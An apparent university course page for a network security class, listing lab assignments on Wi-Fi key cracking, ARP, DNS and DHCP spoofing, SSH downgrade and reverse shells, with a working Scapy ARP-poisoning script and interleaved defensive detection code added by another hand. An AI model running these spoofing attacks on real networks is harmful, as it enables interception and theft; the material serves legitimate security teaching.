TIES327 Network Security (3-5 ECTS)



TIES327 Network Security (3-5 ECTS)
Prof. Timo Hämäläinen, timo.t.hamalainen@jyu.fi
Department of Mathematical Information Technology, IT Faculty, University of Jyväskylä

Important note! If you completed the "old course" TIES326 in 2012 or 2013, you will not get credits for TIES327, because more than 50% of its assignments are the same as those of TIES326 in 2012 and 2013. Students who completed TIES326 before 2012 can get credits for TIES327.

Goals of the course
Students
- understand what the term "security" covers, in particular from the point of view of networks and services
- get familiar with the different security aspects and understand the necessary terms
- are capable of applying the various tools for auditing and protecting against network attacks
- learn to look for new knowledge in this area
A feeling of safety must not be based on ignorance!
The course focuses on hands-on work with security issues and on learning by doing different network security exercises.
Remember: using the presented methods on public networks is illegal!!

Prerequisites
Basic knowledge of networks, TCP/IP protocols and programming, for example from the following courses (or similar knowledge):
- ITKP101 Tietokone ja tietoverkot työvälineenä (Computer and networks as tools)
- ITKP104 Tietoverkot (Computer networks)
- ITKP102 Ohjelmointi 1 (Programming 1)

How to complete the course?
- Complete the assignments in groups of 1-3 students.
- You must get at least 50% of the total points and at least 50% of the points of each assignment.
- 3 ECTS: complete assignments 1-9
- 4 ECTS: complete assignments 1-11
- 5 ECTS: complete all 13 assignments
The assignments cover different network attack configurations and tools for protecting and analysing networks: MITM, WLAN cracking, VPN, firewall, IDS etc.
- pfsense: http://www.pfsense.org/
- Snort: http://www.snort.org/
- Radamsa: http://code.google.com/p/ouspg/wiki/radamsa
- Wireshark: http://www.wireshark.org/
- Scapy: http://secdev.org/projects/scapy/
- Kali Linux: http://www.kali.org/
Exam (not obligatory; for upgrading the grade, max. 15 points).

About the assignments

1. Virtual network configuration
In this first assignment you will create and configure a virtual network which will be used for testing different kinds of network attacks. For this you need a PC with 2 GB of RAM (more is of course better!). We have used Ubuntu, but it is of course possible to build the same virtual network on Windows or Mac OS by using the corresponding commands. https://www.virtualbox.org/

2. Security in social media / student presentations (lecture 3)
Groups of 1-4 students will give a presentation. The topic is security in social media (duration of the presentation 20-25 min). The presentation should cover the following aspects; even better if you can create your own live demo, like e.g. http://www.youtube.com/watch?v=-H1qjiwQldw:
1. What kinds of threats/attacks exist in social media? Social engineering, phishing, spam, code injection, XSS, CSRF/XSRF, DDoS etc.
2. How can you protect against these threats?
3. Possibilities and drawbacks of web technologies: Asynchronous JavaScript And XML (AJAX), Cascading Style Sheets (CSS), Flash, JSON and XML etc.
All groups will return a www link (no attachment!) to their presentation by 9.11 at 23:59 to timo.t.hamalainen@jyu.fi. At the beginning of the lecture we will randomly select four groups to give their presentations.

3. WEP cracking
In this assignment you are going to crack a WEP key with the tools available at http://aircrack-ng.org/. It is intended to build your basic skills and get you familiar with wireless network security concepts. It assumes you have a working wireless card with drivers already patched for injection. The basic concept behind this work is using aireplay-ng, which replays an ARP packet to generate new unique IVs. In turn, aircrack-ng uses the new unique IVs to crack the WEP key. It is important to understand what an ARP packet is (http://tools.ietf.org/html/rfc826).

4. WPA cracking
This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys. We recommend you do some background reading to better understand what WPA/WPA2 is. WPA/WPA2 supports many types of authentication beyond pre-shared keys; aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type PSK, otherwise don't bother trying to crack it. There is another important difference between cracking WPA/WPA2 and WEP: the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute-force techniques can be used against WPA/WPA2. This is because the key is not static, so collecting IVs as when cracking WEP does not speed up the attack. The only thing that gives the information needed to start an attack is the handshake between client and AP, which takes place when the client connects to the network. Although this is not absolutely true, for the purposes of this assignment consider it true. Since the pre-shared key can be 8 to 63 characters long, it is effectively impossible to crack in general. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short.

5. ARP poisoning
In this assignment you are going to perform two Man-In-The-Middle (MITM) attacks: poisoning ARP tables and redirecting ICMP traffic. ARP poisoning is also known as ARP spoofing, ARP flooding and ARP poison routing. So what basically is ARP poisoning? It is a technique which allows an attacker to sniff traffic on a LAN, monitor it and even stop it. ARP poisoning is done by sending fake or spoofed ARP messages onto the Ethernet LAN. By doing so the attacker manages to associate its MAC address with the IP address of another node on the network (typically the default gateway). Traffic meant for the gateway then goes first to the attacker and only then to the gateway, which allows the attacker to sniff traffic from the network.
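
A defender's counterpart to the attack just described, added here as an example that is not part of the course material: a passive ARP monitor (arpwatch-style) that flags the pattern a periodic spoofing loop produces, namely an IP whose MAC binding changes, the same conflicting claim repeated within a short window, and one MAC claiming several IPs. The gateway and victim IPs 192.168.72.2 and 192.168.72.128 come from the page's own script usage line; the MAC addresses and the frame sequence are constructed.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.72.2"          # lab gateway from the page's ArpSpoofing.py usage line
GATEWAY_MAC = "00:50:56:aa:aa:aa"    # constructed; would come from a trusted inventory

# Constructed ARP traffic as (timestamp, sender_ip, sender_mac). Requests and
# replies are treated alike because hosts learn from the sender fields of both,
# which is exactly what a periodic ARP() loop relies on.
SAMPLE_ARP = [
    (0.0,  "192.168.72.2",   GATEWAY_MAC),           # real gateway
    (1.0,  "192.168.72.128", "08:00:27:bb:bb:bb"),   # victim
    (2.0,  "192.168.72.10",  "08:00:27:cc:cc:cc"),   # another host
    (5.0,  "192.168.72.2",   "08:00:27:dd:dd:dd"),   # gateway IP now from a new MAC
    (10.0, "192.168.72.2",   "08:00:27:dd:dd:dd"),   # ... repeated every 5 s
    (15.0, "192.168.72.2",   "08:00:27:dd:dd:dd"),
    (16.0, "192.168.72.128", "08:00:27:dd:dd:dd"),   # same MAC now also claims the victim
]


class ArpMonitor:
    def __init__(self, trusted=None, window=30.0, repeats=3):
        # Seed bindings from a trusted inventory so a poisoning that is already
        # under way when monitoring starts is not learned as the baseline.
        self.bindings = dict(trusted or {})        # ip -> mac
        self.protected = set(self.bindings)        # IPs whose change is high severity
        self.mac_to_ips = defaultdict(set)         # mac -> IPs it has claimed
        self.conflicts = defaultdict(list)         # (ip, mac) -> timestamps of conflicting claims
        self.window, self.repeats = window, repeats

    def observe(self, ts, ip, mac):
        """Return a list of alert tuples for the sender fields of one ARP frame."""
        mac = mac.lower()
        alerts = []
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac                # first sighting: learn it
        elif known != mac:
            alerts.append(("binding_change", ip, known, mac, ip in self.protected))
            hist = self.conflicts[(ip, mac)]
            hist.append(ts)
            hist[:] = [t for t in hist if ts - t <= self.window]
            if len(hist) >= self.repeats:          # same bogus claim keeps coming back
                alerts.append(("repeated_claim", ip, mac, len(hist)))
        if ip not in self.mac_to_ips[mac]:
            self.mac_to_ips[mac].add(ip)
            if len(self.mac_to_ips[mac]) > 1:      # one NIC speaking for several hosts
                alerts.append(("multi_ip", mac, tuple(sorted(self.mac_to_ips[mac]))))
        return alerts


def run_monitor(frames, trusted=None):
    """Feed frames through one monitor; returns (ts, *alert) tuples in order."""
    mon = ArpMonitor(trusted)
    return [(ts,) + a for ts, ip, mac in frames for a in mon.observe(ts, ip, mac)]


if __name__ == "__main__":
    for alert in run_monitor(SAMPLE_ARP, trusted={GATEWAY_IP: GATEWAY_MAC}):
        print(alert)
```

The same logic applied to real traffic only needs the sender IP/MAC of each captured ARP frame; the first alert here fires at the first spoofed frame, and the repeat and multi-IP alerts follow as the loop continues.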

5. ICMP redirection
ICMP (Internet Control Message Protocol) is used to send error messages, report problems and for routing purposes. When a router sends a route redirection to a client, indicating a shorter route to some particular destination, a host-route entry is added to the client's routing table. An attacker can change the client's routing table so that traffic from the client to a web server is redirected to the attacker. For this purpose the attacker sends an ICMP redirect message to the client in which the source IP is the gateway, the source IP for the redirection is the client, the destination IP for the redirection is the web server and the new gateway is the attacker. After the client updates its routing table with the web server's IP address and the attacker's IP address, all traffic from the client to the web server is redirected to the attacker.

6. DNS spoofing
In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS and DHCP servers. The Domain Name System translates names that humans can understand into IP addresses. First, the client sends a DNS query and the DNS server responds with a DNS response; the query and the response carry the same ID number and the same question. The client then updates its DNS cache with the domain name and IP address accordingly. Assume that the attacker wants to change the client's DNS cache so that traffic from the client to the domain web.seclab.jyu.fi is redirected to the attacker's server 192.168.1.102. For this purpose the attacker sniffs DNS queries from the client and waits for a query with the relevant question, then spoofs a DNS response, e.g. with the attacker's IP. The client updates its DNS cache and therefore all traffic goes to the attacker. The attacker keeps spoofing DNS responses to maintain the poisoned cache entry. However, the DNS query eventually reaches the DNS server, which responds with a legitimate DNS response; when the client gets the legitimate response, it updates its cache. For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section, we show how to spoof the DNS server.

6. DHCP spoofing
DHCP (Dynamic Host Configuration Protocol) is used to configure the network settings of hosts on IP networks. DHCP allows hosts to be dynamically configured with an IP address, subnet mask, gateway address and DNS server address. It works as follows: first, the client broadcasts a DHCP Discover containing a transaction ID. The DHCP server responds with a DHCP Offer which contains the same transaction ID. The client then sends a DHCP Request and the DHCP server responds with a DHCP Ack. When applying a DHCP spoofing attack, the attacker waits for a DHCP Discover from the client.

After getting this request the attacker spoofs a DHCP Offer assigning a malicious gateway and/or DNS server. The client responds with a DHCP Request and the attacker spoofs a DHCP Ack as well. Finally, the client updates its DNS server and gateway addresses. However, when the DHCP Discover reaches the real DHCP server, that server responds to the client with a legitimate DHCP Offer; if the client gets the legitimate offer first, DHCP spoofing does not work. For this reason, the attacker runs a DoS against the DHCP server during the attack so that it cannot respond to clients. In this section, we show how to spoof the DHCP server.
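
Detection logic for both spoofing attacks of assignment 6 (DNS and DHCP), added here as an example and not one of the course's own scripts: it tracks outstanding DNS queries and DHCP transactions and flags a response that contradicts an earlier answer for the same transaction ID and question (the "legitimate answer arrives later" situation described above), a response that matches no query at all, and DHCP offers or acks from a server that is not on an allow-list. The attacker address 192.168.1.102 and the name web.seclab.jyu.fi are from the text; the resolver/DHCP server 192.168.1.1, the 203.0.113.0/24 documentation-range answers and the event sequences are constructed.

```python
# Constructed DNS events: (kind, ts, src_ip, dst_ip, txid, qname, answer).
# The spoofed response (second event) is forged to look as if it came from the
# real resolver 192.168.1.1 (constructed), so a source-IP check alone does not
# catch it; the contradicting legitimate answer that follows does.
DNS_EVENTS = [
    ("query",    1.00, "192.168.1.50", "192.168.1.1",  0x1a2b, "web.seclab.jyu.fi", None),
    ("response", 1.01, "192.168.1.1",  "192.168.1.50", 0x1a2b, "web.seclab.jyu.fi", "192.168.1.102"),
    ("response", 1.05, "192.168.1.1",  "192.168.1.50", 0x1a2b, "web.seclab.jyu.fi", "203.0.113.10"),
    ("query",    2.00, "192.168.1.50", "192.168.1.1",  0x1a2c, "www.example.net",   None),
    ("response", 2.02, "192.168.1.1",  "192.168.1.50", 0x1a2c, "www.example.net",   "203.0.113.20"),
    ("response", 3.00, "192.168.1.1",  "192.168.1.50", 0x7777, "www.example.org",   "192.168.1.102"),
]


def check_dns(events):
    """Alerts for responses that answer no outstanding query, or that contradict
    an earlier response carrying the same transaction ID and question. Repeated
    identical answers are left alone: they look like ordinary retransmissions."""
    pending = set()   # (client, txid, qname) with a query in flight
    answered = {}     # (client, txid, qname) -> first answer seen
    alerts = []
    for kind, ts, src, dst, txid, qname, answer in events:
        if kind == "query":
            pending.add((src, txid, qname))
            continue
        key = (dst, txid, qname)
        if key not in pending and key not in answered:
            alerts.append(("unsolicited_response", ts, qname, answer))
        elif key in answered and answered[key] != answer:
            alerts.append(("conflicting_answers", ts, qname, answered[key], answer))
        else:
            answered.setdefault(key, answer)
            pending.discard(key)
    return alerts


# Constructed DHCP events: (kind, ts, server_id, client_mac, xid, gateway, dns);
# server_id is the DHCP server identifier (option 54) carried in offers and acks.
DHCP_EVENTS = [
    ("discover", 10.00, None,            "08:00:27:bb:bb:bb", 0x3903f326, None,            None),
    ("offer",    10.01, "192.168.1.102", "08:00:27:bb:bb:bb", 0x3903f326, "192.168.1.102", "192.168.1.102"),
    ("offer",    10.05, "192.168.1.1",   "08:00:27:bb:bb:bb", 0x3903f326, "192.168.1.1",   "192.168.1.1"),
    ("ack",      10.10, "192.168.1.102", "08:00:27:bb:bb:bb", 0x3903f326, "192.168.1.102", "192.168.1.102"),
]
ALLOWED_DHCP_SERVERS = frozenset({"192.168.1.1"})   # assumed legitimate server


def check_dhcp(events, allowed=ALLOWED_DHCP_SERVERS):
    """Alerts for offers/acks from a server not on the allow-list (the rogue
    server above) and for server messages that match no outstanding discover.
    Two offers for one xid are normal when several servers exist, so the
    allow-list, not the count, decides."""
    pending = set()   # (client_mac, xid)
    alerts = []
    for kind, ts, server, mac, xid, gateway, dns in events:
        if kind == "discover":
            pending.add((mac, xid))
            continue
        if kind == "request":      # client side, nothing to check here
            continue
        if (mac, xid) not in pending:
            alerts.append(("unsolicited_" + kind, ts, server, mac))
        if server not in allowed:
            alerts.append(("rogue_" + kind, ts, server, mac, gateway, dns))
        if kind == "ack":
            pending.discard((mac, xid))
    return alerts


if __name__ == "__main__":
    for a in check_dns(DNS_EVENTS) + check_dhcp(DHCP_EVENTS):
        print(a)
```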

7. Annoying HTTP server and bank attack
This assignment deals with two Man-In-The-Middle (MITM) attacks: an annoying HTTP server and a bank attack. Once an attacker is located in the middle between the victim and other network nodes, he can easily change the HTTP requests and responses which pass through him. In this section, the attacker changes the web pages which the victim requests from a web site to make the victim nervous. For this attack, the attacker first poisons the ARP cache of the victim in order to be "in the middle". Then, when the victim requests a web page, he modifies all pictures on the page and sends the result to the victim.
Bank attack: in this section we consider the case where the attacker places himself "in the middle" and then steals money from the victim's bank account when the victim logs in to the system. Despite the fact that the bank web site uses the cryptographic protocol SSL, the attacker is still able to transfer the victim's money to another bank account.

8. SSH downgrading
Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers, which it connects via a secure channel over an insecure network. The protocol specification distinguishes two major versions, referred to as SSH-1 and SSH-2. Here we consider the most famous example of a downgrade attack, where the attacker forces the client and the server to use the insecure SSH-1 protocol. The client sends a request to establish an SSH connection to the server and asks which version it supports. The server answers with one of:
- ssh-2.xx, i.e. the server supports only SSH-2,
- ssh-1.99, i.e. the server supports SSH-1 and SSH-2,
- ssh-1.51, i.e. the server supports only SSH-1.
In our example, the server is configured to support both SSH-1 and SSH-2, and the client is set to use SSH-2 and SSH-1 with SSH-2 as the preference. In this case the attacker, if he is already located in the middle (e.g. after ARP poisoning), changes the answer by modifying the "1.99" string to "1.51" to indicate to the client that the server supports only SSH-1, and thus forces the client to open an SSH-1 connection. The client, who thinks it is using the secure SSH-2 protocol, logs in with SSH-1 and the password is immediately captured by the attacker because of the weak password authentication mechanism of SSH-1.
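
A model of the version exchange above with a client-side protocol policy, added here as an example (not OpenSSH's code): it parses the server identification string, maps "1.99" to "both versions offered", and shows that a client restricted to SSH-2 refuses the rewritten "1.51" banner instead of falling back, which is the configuration-level defence against this downgrade. The software-version strings in the banners are constructed.

```python
import re

# Identification string format: "SSH-protoversion-softwareversion [comments]"
BANNER_RE = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)")


def parse_banner(line):
    """Return (protoversion, softwareversion) from a server banner such as
    'SSH-1.99-OpenSSH_5.3' (software string constructed), or raise ValueError."""
    m = BANNER_RE.match(line.strip())
    if m is None:
        raise ValueError("not an SSH identification string: %r" % line)
    return m.group("proto"), m.group("software")


def offered_versions(proto):
    """Protocol majors the server announces. '1.99' is the conventional way of
    saying 'SSH-1 and SSH-2 both supported'; anything else is just its major."""
    if proto == "1.99":
        return {1, 2}
    return {int(proto.split(".", 1)[0])}


def negotiate(server_banner, client_prefs=(2, 1)):
    """Protocol a client with the given preference order ends up using, or None
    if nothing acceptable is offered. The downgrade on this page only works when
    1 is in client_prefs; a client pinned to (2,) simply aborts the connection."""
    proto, _ = parse_banner(server_banner)
    offered = offered_versions(proto)
    for major in client_prefs:
        if major in offered:
            return major
    return None


# What the client sees unmodified, and after the in-path "1.99" -> "1.51" rewrite.
GENUINE_BANNER = "SSH-1.99-OpenSSH_5.3"
REWRITTEN_BANNER = "SSH-1.51-OpenSSH_5.3"


def downgrade_outcome(client_prefs):
    """(version chosen with the genuine banner, version chosen with the rewritten one)."""
    return negotiate(GENUINE_BANNER, client_prefs), negotiate(REWRITTEN_BANNER, client_prefs)


if __name__ == "__main__":
    print("fallback client (2, 1):", downgrade_outcome((2, 1)))
    print("SSH-2-only client (2,):", downgrade_outcome((2,)))
```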

9. Reverse TCP attack
Man-In-The-Middle attacks can be combined with such dangerous attacks as a reverse TCP connection. A firewall usually blocks incoming connections to open ports but does not block outgoing traffic, therefore a reverse connection is used to bypass firewall and router security restrictions. For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet. Once the connection is established, the remote host can send commands to the Trojan horse. Trojan horses that use a reverse connection usually send TCP SYN packets to the attacker's IP address; the attacker listens for these SYN packets and accepts the desired connections.

10. Configuring a VPN connection with the help of OpenVPN
In this assignment you configure an OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates. In addition, it describes dual-factor authentication based on username and password, which are used by the server to authenticate a connecting client. OpenVPN is a full-featured SSL VPN which implements secure network extension using the industry-standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards and/or username/password credentials, and allows user- or group-specific access control policies using firewall rules applied to the VPN virtual interface.

11. Public-key cryptography with GNU Privacy Guard
Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party generates a "keypair" consisting of a "public" key and a "secret/private" key. Each party can then publish their public key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have a person's public key, you can do a few things with it:
- Encrypt a message that only that person can decrypt (they need their secret key to decrypt it).
- Validate that the person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted or modified in transmission.
With your secret key, you can do the following things:
- Decrypt messages encrypted with your public key.
- Sign messages that others can verify came from you (they need your public key to verify the signature).
This assignment explains how to configure and use a Public Key Infrastructure (PKI), encrypt files and sign emails by using GNU Privacy Guard (GPG). The GNU Privacy Guard is the GNU project's complete and free implementation of the OpenPGP standard as defined by RFC 4880. GPG allows you to encrypt and sign your data and communication, and features a versatile key management system as well as access modules for all kinds of public key directories.

12. Configuration of Snort and pfsense
In this assignment you are going to install, configure and tune Snort and pfsense for protecting your network. Snort is a free and open-source (signature-based) network intrusion prevention system and network intrusion detection system. pfsense is an open-source firewall/router software distribution based on FreeBSD.

13. Network traffic anomaly detection
In this assignment, an HTTP access log file is preprocessed into a numerical matrix, anomalous queries are found using dimensionality reduction and clustering, and finally the anomalous log lines are analysed. It is assumed that some kind of Linux distribution is used (running in VirtualBox etc. is fine); a Windows installation might be possible, but it is much easier on Linux. In the following examples the Octave software is used; in addition we need the package octave-statistics. If available, Matlab uses the same syntax. Python is also used, because the character distribution file will be generated with it from the Apache log file.
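
The preprocessing step of assignment 13 done in plain Python, added here as an example and not one of the course's own scripts or Octave code: constructed Apache combined-format log lines are parsed, each request URI is decoded and turned into a character-distribution row, and the rows are scored by their distance from the centroid of all rows; the assignment itself goes on to dimensionality reduction and clustering in Octave on the same kind of matrix. The log lines, client addresses, timestamps and the odd-looking last request are all constructed.

```python
import math
import re
import string
from urllib.parse import unquote_plus

# Constructed Apache "combined" log lines; the last request is the odd one.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 +0300] "GET /index.php?page=home HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Oct/2014:13:55:40 +0300] "GET /index.php?page=news&id=12 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2014:13:56:01 +0300] "GET /search.php?q=network+security HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Oct/2014:13:56:09 +0300] "GET /index.php?page=contact HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2014:13:57:30 +0300] "GET /search.php?q=%27%22%3C%3E%28%29%3B%2F%2A%2A%2F%25%25%25 HTTP/1.1" 500 311 "-" "curl/7.35.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Feature alphabet: one column per printable ASCII character (letters lower-cased).
ALPHABET = string.ascii_lowercase + string.digits + string.punctuation + " "
INDEX = {c: i for i, c in enumerate(ALPHABET)}


def parse_access_log(text):
    """Return one dict per line that matches the combined log format."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def char_distribution(uri):
    """Relative frequency of each alphabet character in the decoded request URI."""
    decoded = unquote_plus(uri).lower()      # %xx and '+' decoded before counting
    counts = [0] * len(ALPHABET)
    total = 0
    for c in decoded:
        i = INDEX.get(c)
        if i is not None:
            counts[i] += 1
            total += 1
    return [n / total if total else 0.0 for n in counts]


def build_matrix(rows):
    """One row per request, one column per alphabet character (the numerical matrix)."""
    return [char_distribution(r["uri"]) for r in rows]


def anomaly_scores(matrix):
    """Euclidean distance of each row from the centroid of all rows; the simplest
    score that already separates a punctuation-heavy request from normal ones."""
    n = len(matrix)
    centroid = [sum(col) / n for col in zip(*matrix)]
    return [math.sqrt(sum((a - b) ** 2 for a, b in zip(row, centroid))) for row in matrix]


def rank_requests(text):
    """(row index, score, uri) tuples sorted most anomalous first."""
    rows = parse_access_log(text)
    scores = anomaly_scores(build_matrix(rows))
    order = sorted(range(len(rows)), key=lambda i: scores[i], reverse=True)
    return [(i, scores[i], rows[i]["uri"]) for i in order]


if __name__ == "__main__":
    for i, score, uri in rank_requests(SAMPLE_LOG):
        print("%.3f  line %d  %s" % (score, i + 1, uri))
```

The matrix returned by build_matrix is what the assignment feeds to Octave; writing it out with one row per line and space-separated columns gives the "character distribution file" the text mentions.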

Tools used in assignments
Kali Linux, http://www.kali.org/
From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system.

Some tools used in assignments
Python, https://www.python.org/
Scapy, http://secdev.org/projects/scapy/
Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining techniques (VLAN hopping + ARP cache poisoning, VoIP decoding on a WEP-encrypted channel, ...), etc.

Tools used in assignments
Python scripts:
- ARP poisoning
- ICMP redirection
- DNS spoofing
- DHCP spoofing
- Annoying HTTP server
- Bank attack
- SSH downgrading
Other files:
- Login database for the bank server
- Certificate file for the bank server
- Bank server
- Keylogger for the Ubuntu reverse TCP attack
- Keylog reader for the Ubuntu reverse TCP attack

An example: ARP poisoning (Python 2 script from the lecture slides)

    from scapy.all import *
    from time import sleep
    import threading
    import os, sys

    class SpoofThread(threading.Thread):
        def __init__(self, victim, gateway):
            # ARP packet whose sender IP is the gateway, addressed to the victim
            self.packet = ARP()
            self.packet.psrc = gateway
            self.packet.pdst = victim
            threading.Thread.__init__(self)

        def run(self):
            counter = 0
            print "spoofing " + str(self.packet.pdst) + " every 5 seconds..."
            try:
                while 1:
                    send(self.packet, verbose=0)
                    counter += 1
                    print 'poison #' + str(counter)
                    sleep(5)
            except Exception as e:
                print type(e)
                print e.args
                print e
                pass

    if __name__ == '__main__':
        if len(sys.argv) != 3:
            sys.exit('usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128 192.168.72.2' % os.path.basename(__file__))
        targets_dest_ips = [sys.argv[1]]
        spoofed_src_ip = sys.argv[2]
        for ip in targets_dest_ips:
            SpoofThread(ip, spoofed_src_ip).start()

Course grading

Total points   Grade
55             5
50             4
45             3
40             2
30             1

Work load: ca. 150 hours, consisting of lectures (ca. 20 hours) and assignments (x hours, depending of course on your background skills).

About the lectures
The lectures are intended to provide an introduction to various network security topics and examples. The course focuses on hands-on work with security issues and on learning by doing (not learning by listening!).
Some literature:
- Lots of research papers:
  - IEEE Xplore, http://ieeexplore.ieee.org/xplore/dynhome.jsp
  - ACM, http://portal.acm.org/dl.cfm
  - Google Scholar, http://scholar.google.com/
- http://site.ebrary.com/lib/jyvaskyla
  - Introduction to Network Security
  - Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions
  - CEH: Certified Ethical Hacker Study Guide

L1: Introduction to network security
- What is security and what are its goals
- Threats to networks and IT systems
- Security policies
- Risk calculation
- Security offences
- Social engineering
- Phishing
- Legislation

L2: Recent network security threats/malware (visiting lecture by Matti Kannela)
- Trojan horses
- Rootkits
- Spyware
- Worms
- Viruses
- Adware
- Backdoors
- Ransomware
- etc.

L3: Security in social media (student presentations)
Assignment 2: groups of 1-4 students give a 20-25 minute presentation on security in social media; the required content and the return deadline are given in the description of assignment 2 above.

L4: Security for 4G cellular networks (visiting lecture by Zheng Chang)
Cellular network security issues (PHY/MAC layers). Security threats:
- User identity
- Femtocells
- Interoperability
- RRC signalling
- Other threats: being an all-IP network makes the system vulnerable to IP attacks, such as Denial of Service (DoS) against the public IP addresses of the core network interfaces, traffic eavesdropping and injection attacks.

L5: Modelling attacks (visiting lecture by Simo Huopio, Finnish Defence Forces)
Modelling and analysing attacks against networks and services:
- DDoS (Distributed Denial of Service)
- Zero-day attacks
- APT (Advanced Persistent Threat)
- Fuzzing / testing programs for vulnerabilities

L6: Protecting your networked services (visiting lecture by Tapio Väärämäki, Exclusive Networks Finland)
- CARM (Cyber Attack Remediation and Mitigation)
- UTM (Unified Threat Management)
- NGFW (Next Generation Firewall)
- WAF (Web Application Firewall)
- Database security
- File security
- Endpoint security

L7: Monitoring and analysing the network data
- Normal network behaviour
- Anomaly detection
- How to gather data
- Pre-processing and analysing the data

Some links
- http://www.cert.fi/
- http://www.vm.fi/tietoturvallisuus
- http://www.digitoday.fi/tietoturva
- http://www.securityfocus.com
- http://www.secureworks.com/cyber-threatintelligence/advanced-threat-services/